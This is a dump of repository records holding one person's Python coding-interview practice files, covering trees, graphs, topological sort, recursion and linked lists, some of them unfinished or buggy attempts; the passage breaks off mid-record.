"text": "# finding the depth of a binary tree\n\n\"\"\"\ninput : root\nBinary tree : not balanced\n\nouput: the height of the tree\n\n 5\n / \\\n 4 7\n / \\ \\\n 12 15 15\n \\\n 19\nuse Breadth first search\n\"\"\"\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\ndef height(root):\n # BFS use queues\n\n #res = []\n\n if root == None:\n return None\n\n queue = []\n\n queue.append(root)\n\n count = -1\n\n while queue:\n level_length = len(queue)\n levelelement = []\n count += 1\n for _ in range(level_length):\n current = queue.pop(0)\n levelelement.append(current.val)\n if current.left:\n queue.append(current.left)\n if current.right:\n queue.append(current.right)\n\n #res.append(levelelement)\n\n return count #len(res) - 1\n\ndef main():\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(3)\n root.right.left = TreeNode(4)\n root.right.left.left = TreeNode(5)\n\n # root = TreeNode(5)\n # root.left = TreeNode(4)\n # root.right = TreeNode(7)\n # root.left.left = TreeNode(12)\n # root.left.right = TreeNode(15)\n\n #root = TreeNode(5)\n\n #root = None\n\n print(\"height:\", str(height(root)))\n\nmain()"
},
{
"alpha_fraction": 0.651260495185852,
"alphanum_fraction": 0.6659663915634155,
"avg_line_length": 30.799999237060547,
"blob_id": "8587b0553250f4b1eb9456cfee505ea640fe70ec",
"content_id": "5bd8ce354aa1a41709c7b3543d4f75093198ee14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 476,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 15,
"path": "/Recursion_DP/BbB/Insert an item at the bottom of a stack.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Insert an item at the bottom of a stack\n\ndef insertBottom(stack, ele):\n\n if len(stack) == 0:\n stack.append(ele) # push the element\n else:\n temp = stack.pop() # temp stores at every recursive instance\n insertBottom(stack, ele) # think the recursive step as if you are going to be inside\n stack.append(temp) # appends at every recursive instance\n\n #print(stack) # will print every time\n return stack\n\nprint(insertBottom([2,3,4,5,6], 1))"
},
{
"alpha_fraction": 0.542001485824585,
"alphanum_fraction": 0.5777940154075623,
"avg_line_length": 23.909090042114258,
"blob_id": "031d31bf872e71d23e2728cc180f53d9df47d67e",
"content_id": "50583994513b17c18845b4d87c45e73af3be8aa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1369,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 55,
"path": "/Sorting/10.9 Sorted Matrix Search:.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSorted Matrix Search: Given an M x N matrix in which each row and each column is sorted in ascending\norder, write a method to find an element.\n\n\"\"\"\n\nimport numpy as np\nfrom bisect import bisect_left\n\n\ndef BinarySearch(a, x):\n i = bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n else:\n return -1\n\n\n# returns the element from bottom most row\ndef sorted_matrix_search(matrix, value):\n matrix = np.array(matrix)\n # print(matrix)\n first_column = matrix[:, 0]\n # print(first_column)\n\n # element_index = bisect_left(first_column, value)\n # if element_index != len(first_column) and first_column[element_index] == value:\n # return element_index\n element_index = BinarySearch(first_column, value)\n # print(element_index)\n if element_index != -1:\n return element_index, 0\n else:\n # selecting row index less than value\n row_index = np.argmin(value - first_column[first_column < value])\n\n while row_index >= 0:\n i = BinarySearch(matrix[row_index], value)\n if i != -1:\n return row_index, i\n else:\n row_index -= 1\n\n return \"Not Found\"\n\n\nm = [[-6, -5, -3, -1, 0],\n [-1, 0, 1,\t2, 3],\n [1, 2, 2, 4, 5],\n [2, 2, 4, 5, 6],\n [4, 5,\t6, 7, 8],\n [6, 7, 8, 9, 10],\n [10, 11, 12, 13, 14]]\n\nprint(sorted_matrix_search(m, -1))"
},
{
"alpha_fraction": 0.5487735271453857,
"alphanum_fraction": 0.5727324485778809,
"avg_line_length": 21.779220581054688,
"blob_id": "0ed3deb229aaa1d20ccf9ddccc44db41b22b57b8",
"content_id": "2da6849ce5cc8760d7cf2b9c6735b47877ebc4e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1753,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 77,
"path": "/Graphs/LC/797. All Paths From Source to Target.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find all paths from source to target\n\n\"\"\"\nGiven a directed acyclic graph of N nodes. Find all possible paths from node 0 to node N-1,\nand return them in any order.\n\nThe graph is given as follows: the nodes are 0, 1, ..., graph.length - 1.\ngraph[i] is a list of all nodes j for which the edge (i, j) exists.\n\nInput: graph = [[1,2],[3],[3],[]]\nOutput: [[0,1,3],[0,2,3]]\nExplanation: There are two paths: 0 -> 1 -> 3 and 0 -> 2 -> 3.\n\n\"\"\"\n\n# not necessary to do\n# convert graph from list of list to dict\ndef list_to_dict(l):\n return dict(zip([i for i in range(len(l))], l))\n\n\ndef bfs(graph, node):\n visited = set()\n path = []\n queue = []\n queue.append(node)\n while queue:\n element = queue.pop(0)\n if element not in visited:\n visited.add(element)\n path.append(element)\n for neighbour in graph[element]:\n queue.append(neighbour)\n\n return path\n\n# write code but wrong logic\n\n# def allPathsSourceTarget(graph):\n# #graph = list_to_dict(graph)\n# res = []\n#\n# for node in graph[0]:\n# path = bfs(graph, node)\n# if len(graph)-1 in path:\n# path.insert(0,0)\n# res.append(path)\n#\n# return res\n\n\n# Count by dfs with memo.\ndef allPathsSourceTarget(graph):\n def dfs(curr, path):\n if curr == len(graph) - 1:\n res.append(path)\n else:\n for i in graph[curr]:\n dfs(i, path + [i])\n\n res = []\n dfs(0, [0])\n\n return res\n\n\n#graph = [[1,2],[3],[3],[]]\ngraph = [[4,3,1],[3,2,4],[3],[4],[]] # this gives the wrong answer for the previous one\n# print(graph)\n# print(bfs(graph, 0))\nprint(allPathsSourceTarget(graph))\n\n\n\n#print(list_to_dict(graph))\n\n#print([i for i in len(graph)])"
},
{
"alpha_fraction": 0.6806219816207886,
"alphanum_fraction": 0.6854066848754883,
"avg_line_length": 24.303030014038086,
"blob_id": "fa171b102f893f44d6afc895cdd9f9fce4c9816f",
"content_id": "c9705abde5c31f294dacc998f196109997178968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 836,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 33,
"path": "/Linked_List/LC/876. Middle of the Linked List.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding a middle element in a linked list\n\n\"\"\"\n\nGiven a non-empty, singly linked list with head node head, return a middle node of linked list.\n\nIf there are two middle nodes, return the second middle node.\n\"\"\"\n\n# lets use fast and slow pointer technique for finding the middle element\n# Logic: once fast pointer reaches the end the slow pointer will be in middle\n# odd length return middle\n# evenlength return 2nd middle\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\ndef middleNode(self, head: ListNode) -> ListNode:\n fastp = head\n slowp = head\n count = 1 # counter if count would be required\n\n while fastp and fastp.next:\n slowp = slowp.next\n count += 1\n fastp = fastp.next.next\n\n return slowp\n\n"
},
{
"alpha_fraction": 0.552949070930481,
"alphanum_fraction": 0.5764074921607971,
"avg_line_length": 25.192981719970703,
"blob_id": "bafd0d5233e19a0318ef524fda0019267a825871",
"content_id": "8580e4cba2093bb6ec0954f4aa115e489b3f84a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1516,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 57,
"path": "/Interview1_1/10_21 Graph.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nyou are given a list of commands
each command looks like this:
\ncommand are: ADD, SUB, MUL, VALUE
VALUE => putting an item in your return array
command looks\nlike: { type: ADD, loc1: number, loc2: number}\nresuts array which keeps track of the output
\nfirst command => res[0]
\nsecond command => res[1]
\ncommand.loc1, you can either have a number, or you have an\nindex '$idx'
for example
{ type: ADD, loc1: 5, loc2: 3} => 8
\nbuut
{type: ADD, loc1: '$1', loc2: '$2' } => add res[1] with res[2]\n\nmake a function that returns an array of commands and returns a results array\ninput: [{ type: VALUE, loc1: 5, loc2: null}, {type: ADD, loc1: '$0', loc2: 3}]
\nreturns [5, 8]\n\n\"\"\"\n# can try to develop a graph\n\"\"\"\nprobable solution:\n1) lenght = len(input) , results= []\n\n\n\"\"\"\n\ndef command(command_list):\n lenght = len(command_list)\n\n results = []\n\n for command in command_list:\n if command['type'] == \"VALUE\":\n if isinstance(command['loc1'], str):\n if results[int(command['loc1'][1])]:\n results.append(results[int(command['loc1'][1])])\n else:\n results.append(None)\n else:\n results.append(command['loc1'])\n if command['type'] == \"ADD\":\n if isinstance(command['loc1'], str):\n if results[int(command['type'][1])]:\n results.append(results[int(command['type'][1])])\n else:\n results.append(None)"
},
{
"alpha_fraction": 0.4367816150188446,
"alphanum_fraction": 0.4687100946903229,
"avg_line_length": 17.23255729675293,
"blob_id": "97d1b41025c1baeb0063083b592de271e4805b55",
"content_id": "0df2f0c3f9ffc8b1af6d0deb0051ba2401d40b2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 43,
"path": "/Interview1_1/11_4 Recursion.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Binary search using recursion\n\n\"\"\"\n\ninput: [-1, 2, 4, 5, 6] find = 4\nreturn 2\n\nfind = 7\nreturn None\n\n\"\"\"\n\ndef binarySearch(arr, num):\n\n first_1 = 0\n last_1 = len(arr)- 1\n # mid = (last - first) // 2\n\n def helpersearch(first, last, num):\n\n if first == last:\n if arr[first] == num:\n return first\n else:\n return None\n\n mid = ((last - first) // 2) + first\n\n if arr[mid] == num:\n return mid\n else:\n if num < arr[mid]:\n last = mid - 1\n elif num > arr[mid]:\n first = mid + 1\n\n return helpersearch(first, last, num)\n\n res = helpersearch(first_1, last_1, num)\n\n return res\n\nprint(binarySearch([-1, 2, 4, 5, 6, 7], 8))"
},
{
"alpha_fraction": 0.5842204093933105,
"alphanum_fraction": 0.6061365008354187,
"avg_line_length": 25.633333206176758,
"blob_id": "3406868b1a571e2f5c9341ecd905c063df15bc6a",
"content_id": "b317e7d6dba1b8cf86ff06ddc793a7c2dccd6af2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1609,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 60,
"path": "/educative/17. Topological Sort/5. All task scheduling order.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# not solve, it is backtracking\n\n\"\"\"\nThere are ‘N’ tasks, labeled from ‘0’ to ‘N-1’. Each task can have some prerequisite tasks\nwhich need to be completed before it can be scheduled. Given the number of tasks and a list\nof prerequisite pairs, write a method to print all possible ordering of tasks meeting all prerequisites.\n\n\"\"\"\n\n\"\"\"\nSo I can do topological sort and find out if it is possible to get all the sequences. \nso the sequences will be depending upon the number of sources in \n\n\"\"\"\n\nfrom collections import deque\n\ndef print_orders(tasks, prerequisites):\n orders = []\n\n # if no orders\n if tasks <= 0:\n return orders\n\n # make the graph and inDegree\n inDegree = {i:0 for i in range(tasks)}\n graph = {i:[] for i in range(tasks)}\n\n for edge in prerequisites:\n parent, child = edge[0], edge[1]\n inDegree[child] += 1\n graph[parent].append(child)\n\n sources = deque()\n\n for key in inDegree:\n if inDegree[key] == 0:\n sources.append(key)\n\n while sources:\n node = sources.popleft()\n orders.append(node)\n\n for vertex in graph[node]:\n inDegree[vertex] -= 1\n if inDegree[vertex] == 0:\n sources.append(vertex)\n\n\n if len(orders) != tasks:\n return []\n\n return orders\n\ndef main():\n print(\"print order:\" + str(print_orders(3, [[0, 1], [1, 2]])))\n print(\"print order:\" + str(print_orders(3, [[0, 1], [1, 2], [2, 0]]))) # none will have indgree one\n print(\"print order:\" + str(print_orders(6, [[2, 5], [0, 5], [0, 4], [1, 4], [3, 2], [1, 3]])))\n\nmain()"
},
{
"alpha_fraction": 0.5668933987617493,
"alphanum_fraction": 0.5668933987617493,
"avg_line_length": 22.236841201782227,
"blob_id": "92f54d60b1c906e8a0b4cc5daba4fd5c0fb477dc",
"content_id": "7839260e4e041525c2cbd75be1d40ced07761085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 38,
"path": "/Graphs/Graph_DFS.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Traversing the graph using Depth first search (DFS)\n\n# visited set to keep track of visiting nodes\nvisited = set()\n\n# using resursion\ndef dfs_recursion(visited, graph, node): # node is the starting node\n if node not in visited:\n print(node)\n visited.add(node)\n for neighbour in graph[node]:\n dfs(visited, graph, neighbour)\n\n# DFS using stack\ndef dfs(visited, graph, node):\n stack = []\n stack.append(node)\n while stack:\n element = stack.pop()\n if element not in visited:\n print(element)\n visited.add(element)\n for neighbour in graph[element]:\n stack.append(neighbour)\n\n\n\n# Using a Python dictionary to act as an adjacency list\ngraph = {\n 'A' : ['B','C'],\n 'B' : ['D', 'E'],\n 'C' : ['F'],\n 'D' : [],\n 'E' : ['F'],\n 'F' : []\n}\n\nprint(dfs(visited, graph, 'A'))"
},
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.6776119470596313,
"avg_line_length": 26.83333396911621,
"blob_id": "ec425f745f009f7626e34792759ac2f30f5416e1",
"content_id": "a8e69e4ecd428e2da08e62a387039b82df7b8951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 24,
"path": "/Arrays_Strings/HR/Sherlock and Anagrams.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find all possible anagrams\n\n\"\"\"\n\nTwo strings are anagrams of each other if the letters of one string can be rearranged to form the other string.\n Given a string, find the number of pairs of substrings of the string that are anagrams of each other.\n\nFor example , the list of all anagrammatic pairs is at positions respectively.\n\n\n\"\"\"\nfrom collections import Counter\n\ndef sherlockAndAnagrams(s):\n arr = []\n # all possible strings\n for i in range(1, len(s)):\n for j in range(0, len(s)- i + 1):\n arr.append(\"\".join(sorted(s[j:j+i])))\n\n count = Counter(arr)\n #return v > 1 for k, v in count.items():\n\nprint(sherlockAndAnagrams(\"mom\"))\n\n\n"
},
{
"alpha_fraction": 0.5525727272033691,
"alphanum_fraction": 0.5883668661117554,
"avg_line_length": 21.923076629638672,
"blob_id": "ead336ffc883f56355b103cec08a7436b382a709",
"content_id": "a5dfb5548ce97d47ccea60ea4f62b20c4c59d0f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 39,
"path": "/Stacks and Queues/17.9 Kth multiple.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\n\"\"\"\nKth Multiple: Design an algorithm to find the kth number such that the only prime factors are 3, 5, and 7.\nNote that 3, 5, and 7 do not have to be factors,but it should not have any other prime factors.\nFor example,the first several multiples would be(in order) 1,3,5,7,9,15, 21.\n\"\"\"\n\n\"\"\"\nWill maintain 3 queues and multiply again and again\n\"\"\"\n\n\ndef k_multiple(k):\n res_Q = [1, 3, 5, 7]\n temp_Q = [3, 5, 7]\n multiples = [3, 5, 7]\n\n if k <= 0:\n raise ValueError(\" value can't be less than 1\")\n if k < 5:\n return res_Q[k-1]\n\n while len(res_Q) < k:\n next_element = temp_Q.pop(0)\n\n for i in multiples:\n allow_element = next_element * i\n if allow_element not in res_Q:\n res_Q.append(allow_element)\n temp_Q.append(allow_element)\n\n return res_Q[-1]\n\n\nprint(k_multiple())\n\n\n\"\"\"\nCan do better\n\"\"\""
},
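Note on the Kth-multiple entry above: one way to "do better", as its closing note suggests, is a min-heap, which yields the next value in sorted order in O(log k) per pop instead of a linear min scan (a sketch; the function name is illustrative, not from the original file):

import heapq

def k_multiple_heap(k):
    heap, seen = [1], {1}
    for _ in range(k - 1):
        smallest = heapq.heappop(heap)
        for factor in (3, 5, 7):
            candidate = smallest * factor
            if candidate not in seen:
                seen.add(candidate)
                heapq.heappush(heap, candidate)
    return heap[0]  # after k - 1 pops, the kth value is the smallest remaining

print(k_multiple_heap(7))  # 21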
{
"alpha_fraction": 0.5567484498023987,
"alphanum_fraction": 0.5966257452964783,
"avg_line_length": 19.40625,
"blob_id": "2315bfcbf07e0064cf4efd254a2c9889bcc8009d",
"content_id": "b698d06a09c8c701c448fd1dd46c314649957130",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 652,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 32,
"path": "/Recursion_DP/BbB/counteven.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# counting even numbers in array using recursion\n\n# building result as we return\ndef countEven(arr):\n return countEvenhelper(arr, 0)\n\n\ndef countEvenhelper(arr, i):\n if i >= len(arr):\n return 0\n result = countEvenhelper(arr, i + 1)\n if arr[i] % 2 == 0:\n result += 1\n return result\n\n\n#print(countEven([1, 2, 3, 4, 5, 6, 8]))\n\n# passing variable\ndef countEvenPassed(arr):\n result = 0\n helperfun(arr, 0, result)\n return result\n\ndef helperfun(arr, i, result):\n if i >= len(arr):\n return\n if arr[i] % 2 == 0:\n result += 1\n helperfun(arr, i+1, result)\n\nprint(countEvenPassed([1, 2, 3, 4, 5, 6, 8]))"
},
{
"alpha_fraction": 0.5973072052001953,
"alphanum_fraction": 0.6187270283699036,
"avg_line_length": 26.233333587646484,
"blob_id": "df2dca2a82f385d1ded163779c7de743f7a02ed0",
"content_id": "d28149fe8582fb685f752c2069787d0b1d23129e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1646,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 60,
"path": "/educative/17. Topological Sort/3. Task Scheduling.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Scheduling the task\n\n\"\"\"\nThere are ‘N’ tasks, labeled from ‘0’ to ‘N-1’. Each task can have some prerequisite tasks which need\nto be completed before it can be scheduled. Given the number of tasks and a list of prerequisite pairs,\nfind out if it is possible to schedule all the tasks.\n\"\"\"\n\n\"\"\"\ntopological sorting where i will sort the vertices based on given relations and find out if task scheduling is \npossible or not\n\n\"\"\"\n\nfrom collections import deque\n\ndef scheduling(tasks, prerequisites):\n\n scheduleOrder = []\n\n if tasks <= 0:\n return scheduleOrder\n\n # initialize the graph\n inDegree = {i: 0 for i in range(tasks)}\n graph = {i: [] for i in range(tasks)}\n\n # populate the graph and indegree\n for edge in prerequisites:\n parent, child = edge[0], edge[1]\n inDegree[child] += 1\n graph[parent].append(child)\n\n # from where the things originate\n sources = deque()\n for node in inDegree:\n if inDegree[node] == 0:\n sources.append(node)\n\n while sources:\n vertex = sources.popleft()\n scheduleOrder.append(vertex)\n for child in graph[vertex]:\n inDegree[child] -= 1\n if inDegree[child] == 0:\n sources.append(child)\n\n # check for cycles\n # if len(scheduleOrder) > tasks:\n # return False\n print(graph)\n print(scheduleOrder)\n return len(scheduleOrder) == tasks\n\n\ndef main():\n print(scheduling(3, [[0, 1], [1, 2]]))\n print(scheduling(3, [[0, 1], [1, 2], [2, 0]])) # none will have indgree one\n print(scheduling(6, [[2, 5], [0, 5], [0, 4], [1, 4], [3, 2], [1, 3]]))\nmain()\n"
},
{
"alpha_fraction": 0.5128205418586731,
"alphanum_fraction": 0.5280448794364929,
"avg_line_length": 23.431371688842773,
"blob_id": "e14214b8e98fde76d806a24044998e8842144931",
"content_id": "0bfef5af2001976594641fee03c097af43d07f24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1248,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 51,
"path": "/Graphs/LC/130. Surrounded Regions.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find the surrounded regions\n\n\"\"\"\nInput:\n'X' 'X' 'X' 'X'\n'X' O O 'X'\n'X' 'X' O 'X'\n'X' O 'X' 'X'\n\nOutput:\n'X' 'X' 'X' 'X'\n'X' 'X' 'X' 'X'\n'X' 'X' 'X' 'X'\n'X' O 'X' 'X'\n\n\"\"\"\n\n\"\"\"\nsteps:\nfirst i will go thorough the borders and see if any zeros are there and make it one \nfirst row, last row, first column, last column if any one converted, repeat the row and column with -1 \n\nthen going each row by row we will convert all the 0 to 'X' \nthen going each row by row convert all the ones to zero\n\n\"\"\"\n\n#def solve(self, board: List[List[str]]) -> None:\ndef solve(board):\n changed_any = 0\n def convertingtoone(board, fr, lr, fc, lc):\n for i in range(len(board[fr])):\n if board[fr][i] == 0: board[fr][i] = 1\n for i in range(len(board[lr])):\n if board[lr][i] == 0: board[lr][i] = 1\n for i in range(len(board[fr])):\n if board[i][fc] == 0: board[i][fc] = 1\n for i in range(len(board[lr])):\n if board[i][lc] == 0: board[i][lc] = 1\n\n return board\n\n board = convertingtoone(board, 0, len(board)-1, 0, len(board)-1)\n\n return board\n\nboard = [['X', 'X', 'X', 'X'],\n ['X', 0, 0, 'X'],\n ['X', 'X', 0, 'X'],\n ['X', 0, 'X', 'X']]\nprint(solve(board))\n\n\n"
},
{
"alpha_fraction": 0.5102040767669678,
"alphanum_fraction": 0.5227629542350769,
"avg_line_length": 20.266666412353516,
"blob_id": "196afefc26fa2ea50c994450d6f12b3a85b30ede",
"content_id": "1c4a9206294b6708d55442e02ae5e0329fc4b7e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 30,
"path": "/contest_LC/November/Day 3 Consecutive Characters.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Consecutive Characters\n\n\"\"\"\nGiven a string s, the power of the string is the maximum length of a non-empty substring\nthat contains only one unique character.\n\nReturn the power of the string.\n\"\"\"\nfrom collections import Counter\n\ndef maxPower(s):\n res = 1\n power = 1\n\n for i in range(len(s)-1):\n for j in range(i+1,len(s)):\n if s[i] == s[j]:\n power += 1\n else:\n if power > res:\n res = power\n power = 1\n break\n if power > res:\n res = power\n power = 1\n\n return res\n\nprint(maxPower2(\"leetcode\"))"
},
{
"alpha_fraction": 0.45357832312583923,
"alphanum_fraction": 0.5019342303276062,
"avg_line_length": 17.140350341796875,
"blob_id": "086c535435b4cd3e41406b00798842bcaae24eda",
"content_id": "38de278e763a340a6dc92a355c1ace13cb2cf9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1034,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 57,
"path": "/Recursion_DP/LC/1137. N-th Tribonacci Number.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe Tribonacci sequence Tn is defined as follows:\n\nT0 = 0, T1 = 1, T2 = 1, and Tn+3 = Tn + Tn+1 + Tn+2 for n >= 0.\n\nGiven n, return the value of Tn.\n\n\"\"\"\n\n# Normal recursion\ndef tribonacci(n):\n\n if n == 0:\n return 0\n elif n == 1 or n == 2:\n return 1\n else:\n return tribonacci(n-1) + tribonacci(n-2) + tribonacci(n-3)\n\n# top down\ndef tribonacci2(n):\n\n a, b, c = 0, 1, 1\n\n for _ in range(n-2):\n a, b, c = b, c, a + b + c\n print(a, b, c)\n\n return c\n\n\n# with memoization\nh_map = {0: 0, 1: 1, 2: 1}\ndef tribonacci3(n):\n\n\n if n in h_map:\n return h_map[n]\n else:\n value = tribonacci3(n-1) + tribonacci3(n-2) + tribonacci3(n-3)\n h_map[n] = value\n return value\n\ndef tribonacci4(n):\n hmap = {0: 0, 1: 1, 2: 1}\n\n def trib(n):\n if n in hmap:\n return hmap[n]\n else:\n value = trib(n - 1) + trib(n - 2) + trib(n - 3)\n hmap[n] = value\n return value\n\n return trib(n)\n\nprint(tribonacci3(500))\n"
},
{
"alpha_fraction": 0.5922242403030396,
"alphanum_fraction": 0.6311030983924866,
"avg_line_length": 18.421052932739258,
"blob_id": "66ca66c09daf5d87ecce217593becbf0f32f0b78",
"content_id": "ead4ba81e345407e2e089edb672e6e90f495acca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 57,
"path": "/Interview1_1/11_17.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nGiven a set of integers, find the maximum sum of values that are under a weight W.
\ne.g.
vals = [ 7, 10, 4, 3, 17, 8 ]
W = 5
Solution: 4
OR
\nvals = [ 7, 10, 4, 3, 17, 8 ]
W = 19
solution: 18
\nBONUS:
Bonus 1: Return the maximum subset under the given weight
\nBonus 2: Ensure that no sub problem is calculated more than once
\n\"\"\"\n\n\"\"\"\nSol\nbase: if index >= len(val) or if sum > W:\nreturn 0\n\nmax_val\n\nrecursive step:\n value1 = 0\n value1 = sum[set] + max_val(val[1:], set, W, index) #\n value2 = max_val(val, set, W, index+1)\n \n return max(value1, value2)\n\"\"\"\n\ndef maximum_value(val, W):\n return max_possible(val,[], W, 0)\n\ndef max_possible(val,combination, W, index):\n # base case\n if index >= len(val) or sum(combination) <= W:\n return 0\n\n combination = combination.append(val[index])\n # recursive step\n value1 = 0\n # value1 = val[index] + max_possible(val, combination.append(val[index]), W, index+1)\n # value1 = sum(combination) + max_possible(val, combination.append(val[index]), W, index+1)\n value2 = max_possible(val, combination, W, index+1)"
},
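Note on the entry above: a sketch for its "Bonus 2" (no sub-problem computed more than once), memoizing on (index, remaining capacity) under the same strict "< W" reading; the function names are illustrative, not from the original file.

from functools import lru_cache

def maximum_value_memo(vals, W):
    vals = tuple(vals)  # fix the item list; the cache key is (index, cap)

    @lru_cache(maxsize=None)
    def best(index, cap):
        if index >= len(vals) or cap <= 0:
            return 0
        skip = best(index + 1, cap)
        take = 0
        if vals[index] < cap:
            take = vals[index] + best(index + 1, cap - vals[index])
        return max(skip, take)

    return best(0, W)

print(maximum_value_memo([7, 10, 4, 3, 17, 8], 19))  # 18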
{
"alpha_fraction": 0.6232227683067322,
"alphanum_fraction": 0.6398104429244995,
"avg_line_length": 18.18181800842285,
"blob_id": "e5b75202cb7f0b2bd07255a881dfba9bcbec6d80",
"content_id": "a8ff478d554973643b3f89a6fe73d3e72a80d46b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 22,
"path": "/Recursion_DP/BbB/reversell.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# from sam\n# reverse a LL\n\nclass Node:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef printreverseLL(head):\n if head == None:\n return\n printreverseLL(head.next)\n print(head.val)\n\n#Creating a linked list\nhead = Node(2)\nhead.next = Node(4)\nhead.next.next = Node(6)\nhead.next.next.next = Node(8)\nhead.next.next.next.next = Node(10)\n\nprint(printreverseLL(head))\n"
},
{
"alpha_fraction": 0.567415714263916,
"alphanum_fraction": 0.5852059721946716,
"avg_line_length": 19.941177368164062,
"blob_id": "ffc3b169bb47d75cca0f0ebbd61794cdacf48845",
"content_id": "ec259809d1c040c3e0d3d74f6fb0d7be8231fff7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1068,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 51,
"path": "/Graphs/LC/841. Keys and Rooms.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# I have to find whether i am able to reach all the doors starting from zero\n\n\"\"\"\n\nInput: [[1],[2],[3],[]]\n\nOutput: boolean (T/F)\n\n\"\"\"\n\n\"\"\"\nMy approach\napply DFS to the solution \n create a list remaining = from [1..len(graph)-1]\n \n indicator while all the nodes are traversed and remaining \nif neighbour in remaing: \n remainig.remove(neighbour)\n\nreturn len(remaining) == 0\n\n\"\"\"\n\n# Runtime = O(V+E)\n#def canVisitAllRooms(self, rooms: List[List[int]]) -> bool:\ndef canVisitAllRooms(rooms):\n rem_rooms = [i for i in range(1, len(rooms))]\n\n visited = set()\n def dfs(r, key):\n stack = [key]\n\n while stack and rem_rooms:\n element = stack.pop()\n if element in rem_rooms:\n rem_rooms.remove(element)\n\n if element not in visited:\n visited.add(element)\n\n for neighbour in rooms[element]:\n stack.append(neighbour)\n\n dfs(rooms, 0)\n\n return len(rem_rooms) == 0\n\n\n#rooms = [[1],[2],[3],[]]\nrooms = [[1,3],[3,0,1],[2],[0]]\nprint(canVisitAllRooms(rooms))\n"
},
{
"alpha_fraction": 0.574999988079071,
"alphanum_fraction": 0.58423912525177,
"avg_line_length": 29.11475372314453,
"blob_id": "e29dbf0ed6f02e116c3ad705c4074aaf98baaf1f",
"content_id": "7af4d4c9a044c90742c7aeb8d36e4ac399d3d445",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1841,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 61,
"path": "/Linked_List/16.25 LRU Cache.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
